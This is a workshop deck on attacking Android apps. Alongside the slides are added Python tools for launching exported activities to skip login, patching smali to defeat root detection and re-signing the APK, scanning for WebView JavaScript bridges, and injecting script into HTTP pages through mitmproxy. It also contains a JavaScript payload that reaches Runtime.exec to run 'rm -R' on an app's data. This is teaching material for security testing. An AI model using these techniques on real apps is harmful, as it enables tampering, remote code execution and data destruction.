
Android mobile app security offensive security workshop


WHO AM I

Next Generation Problem Solver

Researcher & Reader in free time

Speaker at 

Facilitator at Weekend Testing

Bug Bounty Hunter (ex-Crowd Tester)

Reported security vulnerabilities for 50+ unique customers all over the world, including Apple, Yahoo, Outlook, Adobe, etc.

Love to develop nasty code & hack it :)

Works as Security Researcher at Accenture Digital Mobility

Certified Ethical Hacker, AKA Bug Wrangler

Null & OWASP Community

DISCLAIMER

This presentation is intended for educational purposes only, and I cannot be held liable for any kind of damage done to your machine or any other damage. Please don't try these attacks on anyone else's systems without context knowledge or permission; this may harm someone directly or indirectly.

Feel free to use this presentation for practice or education purposes.

It is in no way related to my employer; it is my own research and ideas.

^ I hope you got that ^

HUMLA

MEANS 'ATTACK' IN HINDI

SOCIAL MEDIA FEED

Hashtag for this session: #NullHumla, #MobileSecurity

Twitter handles for feedback: @null0x00, @Abhinav_Sejpal

~ WE AREN'T GOING TO DO THIS ~

So feel free to stop me whenever you have a doubt!

Are you ready to rock?

ANDROID: SMARTPHONE TO IOT

The mobile market is fragmented, and stakeholders want their mobile app better, cheaper and faster. Correct?

What if it has vulnerable code? WOW :D

- Yet to update the stats -

ANDROID PACKAGE - APK

DEVELOPMENT PLAN

ANDROID ARCHITECTURE 

MY HOME IS YOUR APK

OUR ARSENAL

PREREQUISITES CHECKS

Genymotion emulator
Santoku Linux / Appie / Android Tamer
Copy of the shared APK(s)

DROZER FRAMEWORK INTRODUCTION

Drozer console on the host, Drozer Agent on the device. The console attaches to the agent over a TCP port forwarded through adb (31415 by default), and every "run ..." module below is typed at that console.

BYPASS THE ACTIVITY VALIDATION

Start the exported inbox activity directly, skipping the login activity that normally precedes it:

run app.activity.start --component sh.whisper sh.whisper.WInboxActivity
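Before firing app.activity.start you want to know which activities are reachable from outside the app at all. The script below is an added example, not code from the deck or from drozer: it reads a decoded AndroidManifest.xml (the kind apktool writes out), applies the pre-API-31 export rule (an explicit android:exported wins; otherwise an intent-filter makes the activity exported by default) and prints the drozer launch line from the deck plus the plain adb equivalent. The manifest is constructed for illustration; only the package sh.whisper and the class WInboxActivity come from the deck, every other name is an assumption.

```python
# Added example, not from the deck: list the Activities another app (or
# drozer) can start without going through the normal login flow.
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed sample, shaped like the decoded manifest apktool writes out.
# Only sh.whisper and WInboxActivity are from the deck; the rest is assumed.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="sh.whisper">
  <uses-sdk android:minSdkVersion="14" android:targetSdkVersion="22"/>
  <application>
    <activity android:name="sh.whisper.WLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".WInboxActivity">
      <intent-filter>
        <action android:name="sh.whisper.action.OPEN_INBOX"/>
      </intent-filter>
    </activity>
    <activity android:name=".WSettingsActivity" android:exported="true"/>
    <activity android:name=".WInternalActivity" android:exported="false">
      <intent-filter>
        <action android:name="sh.whisper.action.INTERNAL"/>
      </intent-filter>
    </activity>
    <activity android:name=".WHiddenActivity"/>
  </application>
</manifest>
"""


def _attr(element, name):
    """Read an android:-namespaced attribute."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def exported_activities(manifest_xml):
    """Return [(fully qualified class, reason)] for each Activity that other
    apps can start. Rule for targetSdkVersion < 31: an explicit
    android:exported wins; without it, an <intent-filter> makes the Activity
    exported by default, and no filter means it is private to the app."""
    root = ET.fromstring(manifest_xml)
    package = root.get("package")
    found = []
    for activity in root.iter("activity"):
        name = _attr(activity, "name")
        if name.startswith("."):
            name = package + name
        exported = _attr(activity, "exported")
        has_filter = activity.find("intent-filter") is not None
        if exported == "true":
            found.append((name, 'android:exported="true"'))
        elif exported is None and has_filter:
            found.append((name, "implicitly exported: intent-filter, no android:exported"))
    return found


def drozer_command(package, activity):
    """The launch used in the deck, typed at the drozer console."""
    return "run app.activity.start --component %s %s" % (package, activity)


def adb_command(package, activity):
    """The same launch without drozer, through the Activity Manager."""
    return "adb shell am start -n %s/%s" % (package, activity)


if __name__ == "__main__":
    package = ET.fromstring(SAMPLE_MANIFEST).get("package")
    for cls, reason in exported_activities(SAMPLE_MANIFEST):
        print("%s  (%s)" % (cls, reason))
        print("  dz> " + drozer_command(package, cls))
        print("  $ " + adb_command(package, cls))
```

If the launch succeeds and the screen you land on should have required a login, the authorization check lives in the wrong place (in the preceding activity rather than in the activity that shows the data), which is exactly the bug the challenge below asks you to find.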

Self-practice session

Challenge 1 - bypass the fixed authorization for the Whisper app

[email protected] - Password!

AD-HOC FORENSIC ANALYSIS

Can we replicate this issue for the LinkedIn / Hike app?

LinkedIn insecure data storage

INSTALL THE BANK APP - Oh no, I can't use the app because my device is rooted :(

SMALI CODE ANALYSIS

Step 1. Reverse the APK to a JAR (Java classes):

dex2jar-2.0/d2j-dex2jar.sh bank.apk

Step 2. Read the JAR with JD-GUI:

jd-gui bank-dex2jar.jar

Step 3. Reverse the APK to smali code:

java -jar apktool_2.0.0.jar d bank.apk

Step 4. Locate the code that detects root.

Step 5. Locate the same logic in the JAR. The decompiled Java is the easier read; the smali is what you will actually patch.

Step 6. Prepare the logical patch. We can't patch the decompiled Java and get a binary back; we have to patch the smali with the new isRooted logic.

Step 7. The new logic is available in smali.

Step 8. Fix the smali code.

Step 9. Rebuild the binary with apktool.

Step 10. Create a self-signed certificate: http://developer.android.com/tools/publishing/app-signing.html

Step 11. Sign the APK with jarsigner. The rebuilt APK is signed with your key, not the vendor's, so uninstall the original first; Android refuses to update an installed package with a different signature.

Step 12. Check root detection: the updated APK has the patched code, and the app no longer refuses to run on the rooted device.
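Steps 3 to 11 as one script, added here as an example and not taken from the deck: it rewrites every isRooted()Z method in an apktool output tree so the method returns false, leaving the .method header untouched so callers still resolve, and it lists the apktool / keytool / jarsigner / zipalign commands for the rebuild-and-sign steps instead of running them, so you can review them first. The smali is constructed to look like what apktool emits for a check that probes for an su binary; the class name com.example.bank.RootCheck, the keystore name and the script file name are assumptions, and the deck never shows the bank app's real code.

```python
# Added example, not from the deck: patch isRooted() to return false in smali,
# then print the rebuild/sign commands. Names below are assumptions.
import re
import sys
import pathlib

# Constructed smali, shaped like apktool output for a root check that looks
# for an su binary. The real bank app's code is not shown in the deck.
SAMPLE_SMALI = """\
.class public Lcom/example/bank/RootCheck;
.super Ljava/lang/Object;

.method private static fileExists(Ljava/lang/String;)Z
    .locals 1
    new-instance v0, Ljava/io/File;
    invoke-direct {v0, p0}, Ljava/io/File;-><init>(Ljava/lang/String;)V
    invoke-virtual {v0}, Ljava/io/File;->exists()Z
    move-result v0
    return v0
.end method

.method public static isRooted()Z
    .locals 2
    const-string v0, "/system/xbin/su"
    invoke-static {v0}, Lcom/example/bank/RootCheck;->fileExists(Ljava/lang/String;)Z
    move-result v1
    return v1
.end method
"""

# Replacement body: one local register, load boolean false (0x0), return it.
ALWAYS_FALSE_BODY = "    .locals 1\n    const/4 v0, 0x0\n    return v0\n"


def patch_method_to_false(smali, method_name="isRooted"):
    """Replace the body of every `<method_name>()Z` with `return false`.
    The .method line (modifiers, name, descriptor) is kept verbatim so the
    invoke-static / invoke-virtual lines in callers still resolve.
    Returns (patched_text, number_of_methods_patched)."""
    pattern = re.compile(
        r"^(\.method[^\n]*\b%s\(\)Z\n)(?:.*?\n)?(\.end method)$" % re.escape(method_name),
        re.MULTILINE | re.DOTALL)
    return pattern.subn(lambda m: m.group(1) + ALWAYS_FALSE_BODY + m.group(2), smali)


def patch_tree(root_dir, method_name="isRooted"):
    """Walk an apktool output directory and patch every .smali file in place."""
    hits = 0
    for path in pathlib.Path(root_dir).rglob("*.smali"):
        text = path.read_text(encoding="utf-8")
        patched, n = patch_method_to_false(text, method_name)
        if n:
            path.write_text(patched, encoding="utf-8")
            hits += n
            print("patched %d method(s) in %s" % (n, path))
    return hits


def rebuild_and_sign_commands(apk="bank.apk", src="bank_src", out="bank-patched.apk",
                              keystore="humla.keystore", alias="humla"):
    """Steps 3 and 9-11 as shell commands (apktool 2.x, JDK keytool/jarsigner,
    zipalign from the SDK build-tools). Returned rather than executed.
    'patch_root_check.py' is this script saved under an assumed name."""
    aligned = out.replace(".apk", "-aligned.apk")
    return [
        "java -jar apktool_2.0.0.jar d %s -o %s" % (apk, src),
        "python3 patch_root_check.py %s" % src,
        "java -jar apktool_2.0.0.jar b %s -o %s" % (src, out),
        "keytool -genkey -v -keystore %s -alias %s -keyalg RSA -keysize 2048 -validity 10000" % (keystore, alias),
        "jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore %s %s %s" % (keystore, out, alias),
        "zipalign -v 4 %s %s" % (out, aligned),
        "adb install -r %s" % aligned,
    ]


if __name__ == "__main__":
    if len(sys.argv) > 1:
        print("%d method(s) patched under %s" % (patch_tree(sys.argv[1]), sys.argv[1]))
    else:
        patched, n = patch_method_to_false(SAMPLE_SMALI)
        print(patched)
        print("\n".join(rebuild_and_sign_commands()))
```

Run it with no arguments to see the constructed sample patched, or with the apktool output directory to patch a real tree. Note what this does not cover: a root check that is inlined in several places, split across methods with different names, or performed natively, needs the same exercise repeated for each copy, which is why the summary below recommends hardening the validation logic rather than relying on one isRooted() call.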

~ SUMMARY ~

Demo on missing root detection - done
Demo on reversing the APK - done
Demo on rebuilding the APK - done
Demo on a weak binary - done
Fix: use DexGuard rather than ProGuard, and update the logical validation - done
Identify the attack surface in smali code - done
Demo on patching the smali code - done
Demo on APK signing - done
Finally, the root detection bypass - done

Caveat: any check that runs on the client can be patched out the same way. Root detection and obfuscation raise the cost of tampering; they do not make the app trustworthy. Keep the decisions that matter on the server side.

ANDROID WEBVIEW

Android lets an app embed the WebKit open source browser engine to render HTML and JavaScript, and lets that page JavaScript interact with the app's own Java code through a bridge (addJavascriptInterface).

70% of applications use WebViews

There are tweaks to limit the exposure: disable support for JavaScript, disable support for plugins, and disable file system access.

WELL - HTTP VS HTTPS

WebView webView = new WebView(this);
webView.getSettings().setJavaScriptEnabled(false);

IDENTIFY THE APP WITH THE WEBKIT BRIDGE

- Reverse the binary.
- Find the WebView code that calls addJavascriptInterface with JavaScript enabled. Remember, this is smali code.
- Identify and understand the activity that enables JavaScript in the clean (decompiled) Java code.
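Grepping an apktool tree by hand for the two calls above works, but you also want to know whether the JavaScript reflection trick shown later in the deck can actually reach java.lang.Runtime: from Android 4.2 a bridged object only exposes methods annotated with @JavascriptInterface when the app targets API 17 or higher, so the getClass() route is open either on devices below 4.2 or when targetSdkVersion is below 17. The scanner below is an added example, not code from the deck: it walks smali text for addJavascriptInterface (recovering the interface name from the preceding const-string) and setJavaScriptEnabled (resolving the register's last const/4 to true/false), reads targetSdkVersion from apktool.yml and gives a verdict. The smali files and the yml are constructed; the class names under com.example.app and the bridge name "Android" are assumptions.

```python
# Added example, not from the deck: find the WebView attack surface in an
# apktool output tree and decide whether the reflection trick can work.
import re

# Constructed smali, shaped like apktool output for
#   webView.getSettings().setJavaScriptEnabled(true);
#   webView.addJavascriptInterface(new JsBridge(), "Android");
# and for a second activity that leaves JavaScript off. Names are assumed.
SAMPLE_TREE = {
    "smali/com/example/app/WebActivity.smali": """\
.class public Lcom/example/app/WebActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 3
    invoke-virtual {v0}, Landroid/webkit/WebView;->getSettings()Landroid/webkit/WebSettings;
    move-result-object v1
    const/4 v2, 0x1
    invoke-virtual {v1, v2}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
    new-instance v1, Lcom/example/app/JsBridge;
    invoke-direct {v1}, Lcom/example/app/JsBridge;-><init>()V
    const-string v2, "Android"
    invoke-virtual {v0, v1, v2}, Landroid/webkit/WebView;->addJavascriptInterface(Ljava/lang/Object;Ljava/lang/String;)V
    return-void
.end method
""",
    "smali/com/example/app/HelpActivity.smali": """\
.class public Lcom/example/app/HelpActivity;
.method protected onCreate(Landroid/os/Bundle;)V
    .locals 2
    const/4 v1, 0x0
    invoke-virtual {v0, v1}, Landroid/webkit/WebSettings;->setJavaScriptEnabled(Z)V
    return-void
.end method
""",
}
# Constructed apktool.yml fragment; apktool records the SDK versions here.
SAMPLE_APKTOOL_YML = "sdkInfo:\n  minSdkVersion: '9'\n  targetSdkVersion: '16'\n"

CONST = re.compile(r"const/4 (\w+), 0x([01])")
STRING = re.compile(r'const-string (\w+), "([^"]*)"')
SET_JS = re.compile(r"invoke-virtual \{\w+, (\w+)\}, Landroid/webkit/WebSettings;->setJavaScriptEnabled\(Z\)V")
ADD_IFACE = re.compile(r"invoke-virtual \{(\w+), (\w+), (\w+)\}, Landroid/webkit/WebView;->addJavascriptInterface\(")
TARGET_SDK = re.compile(r"targetSdkVersion:\s*'?(\d+)'?")


def scan_smali(text):
    """Return [(kind, line_no, detail)] for one smali file. detail is the
    boolean passed to setJavaScriptEnabled (None if not a const/4) or the
    interface name passed to addJavascriptInterface (None if not a literal)."""
    findings, consts, strings = [], {}, {}
    for n, line in enumerate(text.splitlines(), 1):
        m = CONST.search(line)
        if m:
            consts[m.group(1)] = m.group(2) == "1"
        m = STRING.search(line)
        if m:
            strings[m.group(1)] = m.group(2)
        m = SET_JS.search(line)
        if m:
            findings.append(("setJavaScriptEnabled", n, consts.get(m.group(1))))
        m = ADD_IFACE.search(line)
        if m:
            findings.append(("addJavascriptInterface", n, strings.get(m.group(3))))
    return findings


def target_sdk(apktool_yml):
    m = TARGET_SDK.search(apktool_yml)
    return int(m.group(1)) if m else None


def assess(tree, apktool_yml):
    """tree maps smali path -> text. Returns (findings per file, targetSdk,
    reflection_reachable). The getClass().forName() trick needs a bridge,
    JavaScript on, and no @JavascriptInterface gate; Android 4.2+ applies
    that gate only to apps targeting API 17+, older devices never do."""
    report = {path: scan_smali(text) for path, text in tree.items()}
    report = {path: hits for path, hits in report.items() if hits}
    sdk = target_sdk(apktool_yml)
    has_bridge = any(kind == "addJavascriptInterface" for hits in report.values() for kind, _, _ in hits)
    js_on = any(kind == "setJavaScriptEnabled" and bool(detail) for hits in report.values() for kind, _, detail in hits)
    reflection_reachable = has_bridge and js_on and sdk is not None and sdk < 17
    return report, sdk, reflection_reachable


if __name__ == "__main__":
    report, sdk, reachable = assess(SAMPLE_TREE, SAMPLE_APKTOOL_YML)
    for path, hits in report.items():
        for kind, line_no, detail in hits:
            print("%s:%d  %s(%r)" % (path, line_no, kind, detail))
    print("targetSdkVersion=%s  reflection to Runtime reachable on 4.2+: %s" % (sdk, reachable))
```

To run it on a real target, replace SAMPLE_TREE with a dict built from the .smali files under the apktool output directory and SAMPLE_APKTOOL_YML with that directory's apktool.yml. A bridge with JavaScript on and targetSdkVersion 17 or above is still worth reviewing by hand: every @JavascriptInterface method stays callable from any page the WebView loads.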

 

IS THE NETWORK MALICIOUS?

HTTP vs. vulnerable HTTPS (certificate not validated) vs. properly validated HTTPS

Edit the response from the cloud server (man in the middle)
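The response edit above is the step that turns a WebView bridge into remote code execution: the page only needs to arrive over plaintext HTTP, or over HTTPS that the app fails to validate, for an attacker on the path to append a script to it. The addon below is an added example, not code from the deck: written for mitmproxy (run it with mitmdump -s inject_webview.py), it rewrites only text/html responses fetched over plain http, inserts a script tag before the closing body tag, and leaves HTTPS alone because without a trusted certificate the client would reject the interception anyway. The default payload is a harmless marker; substitute the deck's JS vector for the lab. The fake flow class at the bottom is a constructed stand-in so the hook can be exercised offline, and the script file name is an assumption.

```python
# Added example, not from the deck: a mitmproxy addon that edits HTML
# responses in the middle. Only plain http responses are touched.
import re

# Harmless default; replace with the deck's JS vector for the lab.
DEFAULT_PAYLOAD = '<script>document.title = "injected";</script>'


def should_inject(scheme, content_type):
    """Only plaintext HTTP and only HTML. HTTPS is skipped on purpose: with a
    proper certificate check (or pinning) the client would refuse us."""
    return scheme == "http" and (content_type or "").lower().startswith("text/html")


def inject(html, payload=DEFAULT_PAYLOAD):
    """Insert payload before </body> (case-insensitive); append if absent."""
    tag = payload.encode("utf-8")
    m = re.search(rb"</body\s*>", html, re.IGNORECASE)
    if m:
        return html[:m.start()] + tag + html[m.start():]
    return html + tag


class InjectScript:
    """mitmproxy addon: the `response` hook runs once per completed response."""

    def __init__(self, payload=DEFAULT_PAYLOAD):
        self.payload = payload
        self.hits = 0

    def response(self, flow):
        resp = flow.response
        if resp is None or not should_inject(flow.request.scheme, resp.headers.get("content-type")):
            return
        # mitmproxy's .content is the decoded body; assigning re-encodes it
        # according to Content-Encoding and fixes Content-Length for us.
        resp.content = inject(resp.content, self.payload)
        self.hits += 1


addons = [InjectScript()]


class _FakeResponse:
    def __init__(self, content_type, content):
        self.headers = {"content-type": content_type}
        self.content = content


class _FakeRequest:
    def __init__(self, scheme):
        self.scheme = scheme


class _FakeFlow:
    """Constructed stand-in with the three attributes the hook touches, so the
    addon can be run without mitmproxy installed. Not a mitmproxy object."""

    def __init__(self, scheme, content_type, body):
        self.request = _FakeRequest(scheme)
        self.response = _FakeResponse(content_type, body)


if __name__ == "__main__":
    addon = InjectScript()
    flow = _FakeFlow("http", "text/html; charset=utf-8", b"<html><body><h1>news</h1></body></html>")
    addon.response(flow)
    print(flow.response.content.decode())
```

On the defensive side the same check reads backwards: a WebView that loads its content over HTTPS with the platform's default validation, and with no bridge it does not need, gives this addon nothing to edit.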

MALICIOUS JS VECTOR

<script>
var path = '/data/data/com.box.android/databases/---';

function execute(cmd) {
    document.write("WebView Vulnerability");
    // Reflect from the bridged object to java.lang.Runtime and run cmd
    return window.Android.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null).invoke(null, null).exec(cmd);
}

execute(['/system/bin/rm', '-R', path]);
</script>

BOOM - COMMAND HAS EXECUTED SUCCESSFULLY 

BYPASS THE ACTIVITY +

API ATTACKS WITH VK APP

YES - I'M DONE!

Feel free to write me at bug.wrangler at outlook.com

Or 

Tweet me at Abhinav_Sejpal

We need you!

Attend Null meet-ups and give presentations. Share your ideas and learnings. Talk to our community champions. Your feedback helps us build a good community. Looking forward to your ongoing support.

http://null.co.in/

Say 'Hello' @null0x00

! THANK YOU ! 

@anantshri @oldmanlab @adi1391 @prateekg147 @5h1vang @exploitprotocol

 #Nullblr Leads & Champions

Big thank you to @null0x00, Satish, Apoorva & you All

LICENSE AND COPYRIGHTS

Copyright 2015-2016 https://slides.com/abhinavsejpal/bangalore-android-null-humla/ Abhinav Sejpal

-----

(CC BY-NC-ND 3.0)

Attribution-NonCommercial-NoDerivs 3.0 Unported

  Dedicated to my lovely daddy